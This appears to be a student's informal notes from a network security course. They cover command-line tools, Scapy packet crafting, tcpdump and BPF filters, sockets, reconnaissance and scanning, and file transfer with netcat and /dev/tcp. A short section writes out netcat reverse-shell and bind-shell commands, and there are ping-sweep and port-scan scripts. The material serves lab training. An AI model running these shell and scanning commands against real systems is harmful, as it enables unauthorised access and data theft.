Public Antora
https://net.cybbh.io/public/networking/latest/index.html
Activity CTFd
http://10.50.20.75:8000/
Practice CTFd
http://10.50.22.14:8000/
Miro Whiteboard
https://miro.com/app/board/o9J_klSqCSY=/
---------------------------------------------------------------------------------------------------------------------------------------------------
The map of the environment has been provided in your home directory:
    student_net_range_blue_only.png

All activity PCAPS are provided here:
    /home/activity_resources/pcaps 

Below are a series of useful commands installed on this Internet_Host to use while you are in this course.

    1. To view your IP address and interface information:
        a. current =        ip address (ip addr)
        b. deprecated =     ifconfig

    2. To view your ARP cache:
        a. current =        ip neighbor (ip nei)
        b. deprecated =     arp -a

    3. To view open TCP and UDP sockets:
        a. current = 
            i. TCP =        ss -antlp
            ii. UDP =       ss -anulp
        b. deprecated =     netstat

    4. To view active processes:
        a. static =         ps -elf
        b. real-time =      top or htop

    5. To open file manager from the command line or X11 connection:
        a. nautilus
        b. pcmanfm

    6. Web Browsers:
        a. Firefox
        b. Chromium
        c. Konqueror

    7. To open images from the command line or X11 connection:
        a. Eye of Gnome =                   eog [file]
        b. Nomacs =                         nomacs [file]
        c. Eye of Mate =                    eom [file]
        d. GNU Image Manipulation Program = gimp [file]

    8. Network scanning:
        a. nmap
            -sT = TCP Full connection
            -sS = TCP SYN scanning
            -Pn = Disable ping sweep
            -sU = UDP scanning
        b. zenmap
        c. netcat
            TCP: nc -nzvw1 10.10.0.40 21-23 80
            UDP: nc -unzvw1 10.10.0.40 53 69
        d. ping
        e. traceroute

    9. Network Utilization:
        a. iftop
        b. iptraf-ng

    10. Packet Manipulation (requires root privileges):
        a. scapy
        b. hping3
        c. yersinia     yersinia -G

    11. Packet Sniffing (requires root privileges):
        a. Wireshark
        b. tcpdump
        c. p0f
        d. tshark

    12. Banner Grabbing:
        a. netcat
            Client: nc 10.10.0.40 22
            Listener: nc -lvp 1234
        b. telnet
            telnet 10.10.0.40
        c. wget
            wget -r http://10.10.0.40
            wget -r ftp://10.10.0.40
        d. curl
            curl http://10.10.0.40
            curl ftp://10.10.0.40

    13. DNS Query:
        a. whois
        b. dig
            Records:
                A - IPv4
                AAAA - IPv6
                NS - Name Server
                SOA - Start of Authority
                MX - Mail Server
                TXT - Human readable message

    14. Remote access:
        a. ssh
            ssh student@10.10.0.40
            ssh student@10.10.0.40 -p 2222
        b. telnet
            telnet 10.10.0.40
            telnet 10.10.0.40 23

    15. File Transfer:
        a. scp
            scp student@10.10.0.40:file .
            scp file student@10.10.0.40:
        b. netcat
            nc 10.10.0.40 1234 < file
            nc -lvp 1234 > file




----------------------------------------------------------------------------------------------------------------------------------------------------------
OSI MODEL: 
7 Layers:
Physical
Data Link
Network 
Transport
Session
Presentation
Application
-----------------------------------------------------------------------------------------------------------------------------------------------------------
PHYSICAL LAYER RESPONSIBILITIES
Hardware Specifications
Encoding and Signaling
Data Transmission and Reception
Physical Network Design
----------------------------------------------------------------------------------------------------------------------------------------------------------
DATA LINK SUB-LAYERS
MAC (Media Access Control)
LLC (Logical Link Control)


---------------------------------------------------------------------------------------------------------------------------------------------------------





--------------------------------------------------------------------------------------------------------------------------------------------------------
sudo scapy
a=Ether()      ==== sets a as ethernet which is built in 
a.show()      -shows you the output of dst, src and type

###[ Ethernet ]### 
  dst       = ff:ff:ff:ff:ff:ff
  src       = fa:16:3e:35:0d:0e
  type      = 0x9000
  
 
  a.type=0x0806                                 ------------------------- to change the type 
  
  
###[ Ethernet ]### 
  dst       = ff:ff:ff:ff:ff:ff
  src       = fa:16:3e:35:0d:0e
  type      = ARP
  
  
  
  b=Dot1Q()               ===== es b as  the type of 802.Dot1Q 


b.show()
###[ 802.1Q ]### 
  prio      = 0
  id        = 0
  vlan      = 1
  type      = 0x0

b.vlan=200     ---- sets vlan as 200.(200 is aarbitraty number for the sake of this exercise)


c=IP()   ==== sets c as veriable for IP
>>> c.show()
###[ IP ]### 
  version   = 4
  ihl       = None
  tos       = 0x0
  len       = None
  id        = 1
  flags     = 
  frag      = 0
  ttl       = 64
  proto     = hopopt
  chksum    = None
  src       = 127.0.0.1
  dst       = 127.0.0.1
  \options   \


d=ICMP()
>>> d.show()
###[ ICMP ]### 
  type      = echo-request
  code      = 0
  chksum    = None
  id        = 0x0
  seq       = 0x0
  unused    = ''



sendp(a/b/c/d, iface="eth0")      - sending a packet that was custom crafted




create additional vlan header
 e=Dot1Q()

 e.show()
###[ 802.1Q ]### 
  prio      = 0
  id        = 0
  vlan      = 1
  type      = 0x0

 e.vlan=4444
>>> sendp(a/b/c/d, iface="eth0")
.
Sent 1 packets.

------------------------------------------------------------------------------------------------------------------------------------------------------------

 DAY-2
 --------------------------------------------------------------------------------------------------------------------------------------------------------
 *TCPDUMP
 sudo tcpdump 
 sudo tcpdump -D ( gives you choices for all interface options)
 
 
 sudo tcpdump -i eth0     ---- captures only on eth0
 sudo tcpdump -i eth0 -X    - gives you hex duump 
 sudo tcpdump -i eth0 -XX --- shows ou the ethernet header aswell 
 sudo tcpdump -i eth0 -XX -W writes it to a different file to save
 -V verbose( can stack multiple times)
 
 sudo tcpdump port 80 or 22
 sudo tcpdump portrange 20-100
sudo tcpdump "src net 10.10.0.0/24 && (dst net 10.1.0.0/24) && (! dst host 10.1.0.3)   ----- searches for a source network of (range) to dst network of
(range) bit not the network 10.1.0.3)
---------------------------------------------------------------------------------------------------------------------------------------------------------
* BERKELEY PACKET FILTERS:

BERKELEY PACKET FILTERS (BPF)
Requests a SOCK_RAW socket and setsockopt calls SO_ATTACH_FILTER

sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))
...
setsockopt(sock, SOL_SOCKET, SO_ATTACH_FILTER, ...)

 tcpdump

BERKELEY PACKET FILTERS
Using BPFs with operators, bitmasking, and TCPDump creates a powerful tool for traffic filtering and parsing.

tcpdump {A} [B:C] {D} {E} {F} {G}

A = Protocol (ether | arp | ip | ip6 | icmp | tcp | udp)
B = Header Byte offset
C = optional: Byte Length. Can be 1, 2 or 4 (default 1)
D = optional: Bitwise mask (&)
E = Operator (= | == | > | < | <= | >= | != | () | << | >>)
F = Result of Expresion
G = optional: Logical Operator (&& ||) to bridge expressions

Example:
tcpdump 'ether[12:2] = 0x0800 && (tcp[2:2] != 22 && tcp[2:2] != 23)'      
(goes to the ether header 12th bytes and looks at the next to byte)  ----- *(ether[12:2])*
 = 0x0800 ------ Look at the bytes and make sure the value is 0800(ipv4) and  go to the tcp header 2nd byte and looks a the next two btyes. and make sure 
 it's not port 23  *(tcp[2:2] != 23)')*

BITWISE MASKING
To filter down to the bit(s) and not just the byte.
ip[0] & 0x0F > 0x05   (look at ip byte zero and this value (0x0F) and match it to 0x05)

---------------------------------------
FILTER LOGIC - MOST EXCLUSIVE    ( must be that value)

All designated bit values must be set; no others can be set
tcp[13] = 0x11        --- tcp byte 13 HAS to equal  to 0x11  ( matches everything to make sure nothing else is turned on ) 
--or--
tcp[13] & 0xFF = 0x11

FILTER LOGIC - LESS EXCLUSIVE     ---- (dont care about other flags)
All designated bits must be set; all others may be set

tcp[13] & 0x11 = 0x11    --- go to  the tcp byte 13 and make sure ack and fin are turned on  (0x11) then make sure it equal to the 0x11
 less doesnt care whatever you have turned on just the ones it wants.
--------------------------------------------------------------------------------------------------------------------------------------------------------
 
 
 
________________________________________________________________________________________________________________________________________________________
SDAY 2
---------------------------------------------------------------------------------------------------------------------------------------------------------
3 different types of socket:
Stream
Datagram 
Raw sockets
-------
Stream Sockets - Connection oriented and sequenced; methods for connection establishment and tear-down. Used with TCP, SCTP, and Bluetooth.
Datagram Sockets - Connectionless; designed for quickly sending and receiving data. Used with UDP.
Raw Sockets - Direct sending and receiving of IP packets without automatic protocol-specific formatting.
------


USER SPACE VS. KERNEL SPACE SOCKETS
User Space Sockets
    Stream Sockets
    Datagram Sockets
Kernel Space Sockets
    Raw Sockets

SOCKET CREATION AND PRIVILEGE LEVEL
User Space Sockets - The most common sockets that do not require elevated privileges to perform actions on behalf of user applications.
Kernel Space Sockets - Attempts to access hardware directly on behalf of a user application to either prevent encapsulation/decapsulation or to create packets from scratch, which requires elevated privileges.

USER SPACE APPLICATIONS/SOCKETS
Using tcpdump or wireshark to read a file
Using nmap with no switches
Using netcat to connect to a listener
Using netcat to create a listener above the well known port range(1024+)
Using /dev/tcp or /dev/udp to transmit data

KERNEL SPACE APPLICATIONS/SOCKETS
Using tcpdump or wireshark to capture packets on the wire
Using nmap for OS identification or to set specific flags when scanning
Using netcat to create a listener in the well known port range (0 - 1023)
Using Scapy to craft or modify a packet for transmission
----------------------------------------------------------------------------------------------------------------------------------------------------------
THE SOCKET.SOCKET FUNCTION
Inside the socket.socket. function, you have these arguments, in order:
socket.socket([*family*[,*type*[*proto*]]])
family constants should be: AF_INET (default), AF_INET6, AF_UNIX
type constants should be: SOCK_STREAM (default), SOCK_DGRAM, SOCK_RAW
proto constants should be: 0 (default), IPPROTO_RAW

--------------------------------------------------------------------------------------------------------------------------------------------------------
RAW IPV4 SOCKETS
Raw Socket scripts must include the IP header and the next headers.
Requires guidance from the "Request for Comments" (RFC)to follow header structure properly.
RFCs contain technical and organizational documents about the Internet, including specifications and policy documents.
See RFC 791, Section 3 - Specification for details on how to construct an IPv4 header.


RAW SOCKET USE CASE
Testing specific defense mechanisms - such as triggering and IDS for an effect, or filtering=
Avoiding defense mechanisms
Obfuscating data during transfer
Manually crafting a packet with the chosen data in header fields

--------------------------------------------------------------------------------------------------------------------------------------------------------
Encoding
The process of taking bits and converting them using a specified cipher.
Decoding
Reverse of the conversion process used by the specified cipher for encoding.
Common encoding schemes
UTF-8, Base64, Hex



-------------------------------------------------------------------------------------------------------------------------------------------------------------
__________________________________________________________________________________________________________________________________________________________
DAY 3
Reconnaissance
--------------------------------------------------------------------------------------------------------------------------------------------------------
RECONNAISSANCE
Active

Passive

Internal

External

-------------------------------------------------------------------------------------------------------------------------------------------------------
PASSIVE RECONNAISSANCE
Gathering information about targets without direct interaction
Not as straight forward and requires more time than active reconnaissance
Lower risk of discovery

Involves identifying:
IP addresses and Sub-Domains
External and 3rd party sites
People and Technologies
Content of Interest
Vulnerabilities

Possible tools for gathering:
WHOIS queries
Job site listings
Phone Numbers
Google searches
Passive OS fingerprinting

-------------------------------------------------------------------------------------
PASSIVE EXTERNAL NETWORK RECONNAISSANCE
Information gathered outside of the network using passive methods
Allows for more efficient attacks and plans

PASSIVE EXTERNAL NETWORK RECONNAISSANCE: DNS
Resolves hostnames to IP addresses
RFC 3912
WHOIS queries

PASSIVE EXTERNAL NETWORK RECONNAISSANCE: DIG
Typically between primary and secondary DNS servers
If allowed to transfer externally hostnames, IPs, and IP blocks can be determined

whois ( domain name ) 
dig ( domain name)
dig axfr @(domain mname) for zone transfer

PASSIVE EXTERNAL NETWORK RECONNAISSANCE: ZONE TRANSFERS
Returns DNS information
Supplements base queries

PASSIVE EXTERNAL NETWORK RECONNAISSANCE: HOST HISTORY
netcraft
wayback machine

PASSIVE EXTERNAL NETWORK RECONNAISSANCE: GOOGLE SEARCHES
subdomains
technologies

PASSIVE EXTERNAL NETWORK RECONNAISSANCE: SHODAN
Reveals information about technologies, remote access services, improperly configured services, and network infrastructure.
When selected can give additional information and applicable vulnerabilities

--------------------------------------------------------------------------------------------------------------------------------------------------------
NETWORK SCANNING
Scanning Strategy
Remote to Local
Local to Remote
Local to Local
Remote to Remote

Scanning Approach:
Aim
    Wide range target scan
    Target specific scan
Method
    Single source scan
    Distributed scan

NETWORK SCANNING:
Broadcast Ping and Ping sweep
(for i in {1..254} ;do (ping -c 1 10.10.0.$i | grep "bytes from" &) ;done)
(for /L %i in (1,1,255) do @ping -n 1 -w 200 10.10.0.%i > nul && echo 192.168.1.%i is up.)
ARP scan
SYN scan
(nmap -sS -p- 192.168.56.102 )
Full connect scan
Null scan
FIN scan
XMAS tree scan
UDP scan
Idle scan

NETWORK SCANNING
ACK/Window scan
RPC scan
FTP scan
decoy scan
OS fingerprinting scan
version scan
Protocol ping
Discovery probes
SCTP INIT scan

NETWORK SCANNING - CODE
Example Syntax
nmap [Options] [Target IP/ Subnet]
nc [Options] [Target IP] [Target Port]
(nc  -help / man nc curl cht.sh/nc )

nc -zv localhost(127.0.0.1) 22

*******-----------------------------------------------------------------------------------------------------------******
#!/bin/bash
echo "Enter network address (e.g. 192.168.0): "
read net
echo "Enter starting host range (e.g. 1): "
read start
echo "Enter ending host range (e.g. 254): "
read end
echo "Enter ports space-delimited (e.g. 21-23 80): "
read ports
for ((i=$start; $i<=$end; i++))
do
    nc -nvzw1 $net.$i $ports 2>&1 | grep -E 'succ|open'
done
# (-v) running verbosely (-v on Linux, -vv on Windows),
# (-n) not resolving names. numeric only IP(no D.S)
# (-z) without sending any data. zero-I/O mode(used for scanning)
#(-w1) waiting no more than 1second for a connection to occur
# (2>&1) redirect STDERR to STDOUT. Results of scan are errors and need to redirect to output to grep
# (-E) Interpret PATTERN as an extended regular expression
# ( | grep open) for Debian to display only open connections
# ( | grep succeeded) for Ubuntu to display only the open connections

(NETCAT )

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
NMAP
nmap 10.10.0.40/27 -v


Nmap scan report for 10.10.0.40
Host is up (0.00024s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
80/tcp   open  http
3389/tcp open  ms-wbt-server

Nmap scan report for 10.10.0.62
Host is up (0.00034s latency).
All 1000 scanned ports on 10.10.0.62 are closed

nmap  10.10.0.40/27 -v -Pn -T5 -p 20-25,80
( if you get filtered then there's a an  acl set 
if get closed response that means the box responded wtih it )

nmap  10.10.0.40/27 -v -Pn -T5 -p-   ( scans every known port with the -p- option) 
*******------------------------------------------------------------------------------------************
HOST ENUM 
ip a 
netstat -ntlp    ----- listening 
netstat -antp   ----- all established and listening port 
 ps -elf 
 
 
 
 
 nmap 10.50.33.207
nc 10.50.33.207 23
nc 10.50.33.207 80
GET   


 wget -r  10.50.33.207/    ----- get's it recursively as well as hidden ones 
 
 ------------------------------------------------------------------------------------------------------------------------------------------------------
 DAY-4
 DATA TRANSFER  MOVEMENT and REDIRECTION
 ------------------------------------------------------------------------------------------------------------------------------------------------------
DESCRIBE COMMON METHODS FOR TRANSFERRING DATA
TFTP
FTP
    Active
    Passive
SFTP   ----
SCP    - uses ssh channel 

TFTP
Trivial File Transfer Protocol

RFC 1350 Rev2
UDP transport
Extremely small and very simple communication
No terminal communication () (no console)
Insecure (no authentication or encryption)
No directory services
Used often for technologies such as BOOTP and PXE

FTP
File Transfer Protocol

RFC 959
TCP transport
Uses multiple TCP connections
Control Connection (21) / Data Connection (20)
Authentication through clear-text sign in (username and password)
Insecure in default configuration
Has directory services

SFTP
Secure File Transfer Protocol
TCP transport (TCP port 22)
Uses symmetric and asymmetric encryption
Adds FTP like services to SSH
Authentication through sign in (username and password) or with SSH key
Interactive terminal access


FTPS
File Transfer Protocol Secure
TCP transport (TCP port 443)
Adds SSL/TLS encryption to FTP
Authentication with username/password and/or PKI
Interactive terminal access
-------------------------------------------------------------------------------

SCP
Secure Copy Protocol
TCP Transport (TCP port 22)
Uses symmetric and asymmetric encryption
Authentication through sign in (username and password) or with SSH key
Non Interactive
 
 
Download a file from a remote directory to a local directory
  scp student@172.16.82.106:secretstuff.txt /home/student
  
Upload a file to a remote directory from a local directory
  scp secretstuff.txt student@172.16.82.106:/home/student

Copy a file from a remote host to a separate remote host
 scp -3 student@172.16.82.106:/home/student/secretstuff.txt student@172.16.82.112:/home/student


SCP SYNTAX W/ ALTERNATE SSHD
Download a file from a remote directory to a local directory
 scp -P 1111 student@172.16.82.106:secretstuff.txt /home/student
 
 Upload a file to a remote directory from a local directory
    scp -P 1111 secretstuff.txt student@172.16.82.106:/home/student
 
 SCP SYNTAX THROUGH A TUNNEL
ssh student@172.16.82.106 -L 1111:localhost:22 -NT
Download a file from a remote directory to a local directory
    scp -P 1111 student@localhost:secretstuff.txt /home/student               (use -P to use it on a alternate page)
    
Upload a file to a remote directory from a local directory
    scp -P 1111 secretstuff.txt student@localhost:/home/student
    
    
--------------------------------------------------------------------------------------------------------------------------------------------------------
TRAFFIC REDIRECTION USING TOOLS

NETCAT
NETCAT is the "swiss army knife" networking utility which reads and writes data across network socket connections using the TCP/IP protocol.
It is designed to be a reliable "back end" tool that can be used directly or easily driven by other programs and scripts.

Can be used for the following:
    inbound and outbound connections, TCP/UDP, to or from any ports
    troubleshooting network connections
    sending/receiving data (insecurely)
    port scanning (similar to -sT in Nmap)
    
NETCAT: CLIENT TO LISTENER FILE TRANSFER
    Client (sends file): nc 10.2.0.2 9001 < file.txt
Listener (receive file): nc -l -p 9001 > newfile.txt

NETCAT: LISTENER TO CLIENT FILE TRANSFER
Listener (sends file): nc -l -p 9001 < file.txt
Client (receive file): nc 10.2.0.2 9001 > newfile.txt
   
   (net CAT DEMO )
   nc -l -p 2345 ( remote listening port) 
   
   nc 172.16.82.106 2345   ( connect to the remote host on port 2345 )
   
   

    
    
NETCAT RELAY DEMOS
On Client Relay:
mknod mypipe p
nc 10.1.0.2 9002 0< mypipe | nc 10.2.0.2 9001 1> mypipe
On Listener2 (sends info):

nc -l -p 9002 < infile.txt
On Listener1 (receives info):

nc -l -p 9001 > outfile.txt
Writes the output to listener1 and listener2 through the named pipe
 
 
 mknod <name> p 
  makes a node 
  
  mkfifo Mypipe 
     makes a named pipe
     
     nc -lp 3333 > Mypipe | nc -lp  4444 < Mypipe     
     anything coming to my port 3333 goes to Mypipe and anything on Mypipe goes to  listening port 4444
     
      to access it i'd need to connect vua diff one 
      
     (
      nc -lp 3333 > Mypipe | nc -lp  4444 < Mypipe   ( the one being used as  named pipe machine) 
      nc 172.16.82.106 4444 > Supersecretstuff.txt ( the one that wants the info ) 
      nc 192.168.1.1 3333 < test  (the one sending the info via named pipe)

     
     
  FILE TRANSFER WITH /DEV/TCP
On the receiving box:
nc -l -p 1111 > file.txt

On the sending box:
cat file.txt > /dev/tcp/10.2.0.2/1111

This method is useful for host that does not have NETCAT available.
 
 
 
REVERSE SHELL USING NETCAT
When shelled into the remote host using -c :
nc -c /bin/sh <your ip> <any unfiltered port>

You could even pipe BASH through NETCAT.
/bin/sh | nc <your ip> <any unfiltered port>

Then listen for the shell.
nc -l -p <same unfiltered port> -vvv

You can also listen using the -e with NETCAT.
nc -l -p <any unfiltered port> -e /bin/bash
 
 
 --------------------------------------------------------------------------------------------------------------------------------------------------
 SSH
Various Implementations (v1 and v2)
Provides authentication, encryption, and integrity.
Allows remote terminal sessions
Used for tunneling
Created as a secure replacement for Berkeley Remote commands:
rsh - replaced with ssh, provides a channel for running a shell on a remote computer.
rlogin - replaced with rlogin, provides remote login capability.
rcp - replaced with scp for secure file transfer
sftp (not a unix r command replacement) - creates remote directory listing and file transfer capability over SSH
 
